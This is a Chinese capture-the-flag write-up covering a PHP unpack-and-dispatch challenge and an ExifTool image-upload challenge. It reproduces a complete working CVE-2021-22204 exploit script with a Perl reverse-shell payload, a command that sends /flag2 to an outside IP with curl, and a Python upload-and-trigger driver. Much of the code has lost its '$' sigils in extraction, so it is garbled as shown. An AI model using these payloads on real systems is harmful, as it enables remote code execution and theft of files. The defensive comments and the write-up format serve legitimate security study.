题目内容:pwner:我决定我要开始卷web了,我该怎么学呢?算了,先从基础的php开始学起吧。
index.php
<?php
// Challenge entry point: prints this file's own source to the visitor and
// then silences every runtime diagnostic.
// NOTE(review): error_reporting(0) also hides the warnings that unpack() and
// the variable-function call further down would otherwise emit, so a
// malformed body fails without any trace in the response or the log.
highlight_file(__FILE__);
error_reporting(0);
// Recursively creates the directory at path together with any missing
// parents. Not called anywhere in this listing.
// NOTE(review): the listing lost its `$` sigils during extraction
// (`path` would read `$path` in the original file).
// Security note: mode 0777 makes every created directory world-writable;
// real code would use a tighter mode and confine path to a known base
// directory before calling mkdir().
function createFolder(path)
{
if (!file_exists(path)) {
createFolder(dirname(path));
mkdir(path, 0777);
}
}
// Parses a binary POST body and dispatches on a function name it contains.
// Wire layout (as read back by the two unpack() calls below):
//   six 32-bit ints nDataLen/nHeadLen/nPackTotal/nPackNum/nFileNameLen/nFileDataLen,
//   then nFileNameLen bytes chFileName, then nFileDataLen bytes data.
// Only nFileNameLen, nFileDataLen, chFileName and data are ever used.
// Returns nothing; exits the request on an empty body or a rejected name.
function savePostData()
{
// Raw request body; HTTP_RAW_POST_DATA is a legacy global, php://input is
// the fallback when it is empty.
content =GLOBALS['HTTP_RAW_POST_DATA'];
if (empty(content)) {content = file_get_contents('php://input');
}
// Loose comparison: "" == null is true, so an empty body exits here.
// file_get_contents() returns false on failure, which this also treats as
// empty; an explicit === check would make that intent visible.
if (content == null) {
exit(0);
}format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
// First pass: header only. 'l' is a signed 32-bit int in machine byte order.
head = unpack("format", content);
unset(format);
// Second pass: the same header plus two NUL-padded strings ('a') whose
// lengths are taken from the header just parsed, i.e. the client decides
// how many bytes go into chFileName and into data.
format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . (head["nFileNameLen"]) . 'chFileName' . '/a' . (head["nFileDataLen"]) . 'data';head = unpack("format",content);
// Sink: chFileName is checked against an allow-list and then invoked as a
// variable function with the client-supplied data as its argument. Each
// listed name is dangerous with attacker-chosen input (readfile -> file
// disclosure, unserialize -> object injection, phpinfo -> information
// disclosure). Mitigation: never dispatch on a client-chosen function name;
// map the name to a fixed handler (e.g. match()) that does not receive the
// raw payload, keep unserialize() off the list, and pass strict: true to
// in_array().
if (is_string(head["chFileName"])) {fileName = head["chFileName"];white_func = array("readfile","unserialize","phpinfo");
if (!in_array(fileName,white_func)) {
exit("hi hack!");
}
fileName(head["data"]);
}
// Reached both when chFileName was not a string and after a successful
// dispatch (none of the listed functions exits), so "FAIL" is not a
// reliable error signal.
echo "FAIL";
}
// Runs on every request, after the source has already been printed above.
savePostData();
?> 得到构造相应的unpack数据的方法
<?php
// Writeup helper that builds the binary body index.php's savePostData()
// reads back: pack('l6a<fnlen>a<datalen>', ...) writes six 32-bit ints
// (the first four, 1..4, are never read by the server; the last two are the
// name and data lengths) followed by the function name and its argument.
// var_dump() prints the body URL-encoded together with its byte length.
// NOTE(review): like the listing above, the `$` sigils were lost in
// extraction. white_func on the closing line mirrors the server's allow-list
// and is consumed by the call that follows this block.
function savePostData(fn,data)
{
datalen=strlen(data);
fnlen=strlen(fn);
content=pack("l6a".fnlen."a".datalen,1,2,3,4,fnlen,datalen,fn,data);
var_dump(urlencode(content),strlen(content));
}white_func = array("readfile","unserialize","phpinfo");
savePostData($white_func[2],'99999');将得到的数据在burp的6进制页面逐个插入字符
bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py
bash CVE-2021-22204.sh "system('curl -F "file=@/flag2" 47.99.70.18:4444')" poc2.jpg && python3 1.py只出了exif漏洞的一半flag(/flag1)还有一半flag是convert漏洞的没做出来,网上下了很多POC都没反应(其实exif漏洞也是,最后找到下面这个可用脚本):
#!/bin/bash
# Third-party PoC for CVE-2021-22204 (ExifTool's handling of DjVu annotation
# metadata), reproduced in the writeup as the script that worked against the
# challenge. Flow: write a payload into a DjVu ANTz annotation chunk, then
# embed that DjVu file in a JPEG through a user-defined EXIF tag so that a
# server-side ExifTool run on the upload parses the annotation.
# Defender notes: the weakness is on the ExifTool side, not in the image
# itself; upstream releases that fixed this CVE no longer evaluate the
# annotation, so upload pipelines that call ExifTool/ImageMagick should run a
# patched version, in a sandbox without outbound network (the "reverseme"
# branch below is exactly what egress filtering stops), and should not trust
# the file extension or declared MIME type as proof of a plain JPEG.
RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'
# Banner only (gzip+base64 blob of ASCII art); no effect on the payload.
art=(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD+7xiy1Dxm6s8w0f8+KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX+0f5diM+5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "{G}art{RS}"
# Check for params
# Usage: first argument is the payload text, second is the JPEG to modify.
if [ {#@} -lt 2 ]; then
echo -e "\nUsage: ./CVE-2021-22204 cmd image.jpg"
echo -e "Eg: ./CVE-2021-22204 \"system('id')\" kitten.jpg" echo -e "Reverseshell: ./CVE-2021-22204 \"reverseme IP PORT\" image.jpg"
exit
fi
# Check djvulibre is installed.
# bzz and djvumake (used below) ship with djvulibre-bin; the script offers to
# install it with sudo, which is worth knowing before running it on a shared
# machine.
if [(dpkg-query -W -f='{Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ];then
echo -e -n "\n{R}Warning:{RS} djvulibre-bin is not installed.\n"
echo -e "{G}Confirm: {RS}"
read -p "Install djvulibre-bin now? (y/n):"confirm
if [[{confirm} =~ ^([yY][eE][sS]|[yY])]]; then
sudo apt-get install djvulibre-bin -y
else
exit
fi
fi
# Create payload
# Two shapes: a Perl reverse shell when the first argument starts with
# "reverseme" (IP and port are split off the argument), otherwise the first
# argument is placed verbatim inside the metadata string. Both heredocs are
# left byte-for-byte as given; their content is the file "payload".
echo -e "\nCreating payload"
cmd="1"
if [[ "{cmd:0:9}" = "reverseme" ]]; then
ip=(echo "cmd"| cut -d"" -f 2)
port=(echo "cmd"| cut -d"" -f 3)
echo "IP:ip"
echo "PORT: port"
cat <<EOF> payload
(metadata "\c\${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(port,inet_aton('ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF
else
cat <<EOF>payload
(metadata "\c\${1};")
EOF
fi
cat payload
echo -e "\n"
# Compress payload
# bzz is djvulibre's compressor; the annotation chunk must be bzz-compressed.
bzz payload payload.bzz
# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
# ExifTool config: registers a writable string tag 0xc51b ("HasselbladExif")
# in IFD0 so the DjVu file can be stored inside the JPEG as EXIF data. A
# detection opportunity: a DjVu container inside an EXIF tag of an uploaded
# JPEG has no legitimate reason to exist.
cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
# All EXIF tags are added to the Main table, and WriteGroup is used to
# specify where the tag is written (default is ExifIFD if not specified):
'Image::ExifTool::Exif::Main' => {
# Example 1. EXIF:NewEXIFTag
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
# add more user-defined EXIF tags here...
},
);
1; #end%
EOF
# Writes exploit.djvu into the custom tag of the image named by the second
# argument, in place.
exiftool -config configfile '-HasselbladExif<=exploit.djvu' "2"
# Cleanup of the intermediate files; only the modified JPEG remains.
rm configfile payload.bzz payload exploit.djvu
echo -e -n "\n{G}Finished${RS}"得到前半段flag的poc:
import os,sys
import threading
import requests
# Writeup's upload-and-trigger driver: posts the crafted poc2.jpg (built by
# the CVE-2021-22204 script above; the commented-out lines show how it was
# invoked) to the challenge's /upload endpoint, then requests /info and
# /convert. Per the surrounding text these are presumably the two paths where
# the server runs ExifTool and the image converter on the upload — verify
# against the challenge source.
url="http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
# One session so any cookie set by /upload is reused by the later requests.
session=requests.session()
# cmd=sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh \"{cmd}\" poc2.jpg")
# NOTE(review): the handle returned by open() is never closed; harmless in a
# one-shot script, but `with open(...) as f:` is the usual form.
file=open("poc2.jpg","rb").read()
# Multipart field named 'file'; the declared filename and MIME type are what
# the server sees, which is why extension/MIME checks alone do not stop this.
files = [
('file', ('curl4444.jpg', file, 'image/jpeg')),
]
print(session.post(url + "/upload", files=files).text)
print(session.get(url+"/info").text)
# Prints the second-to-last double-quoted field of the /convert response.
print(session.get(url+"/convert").text.split('"')[-2])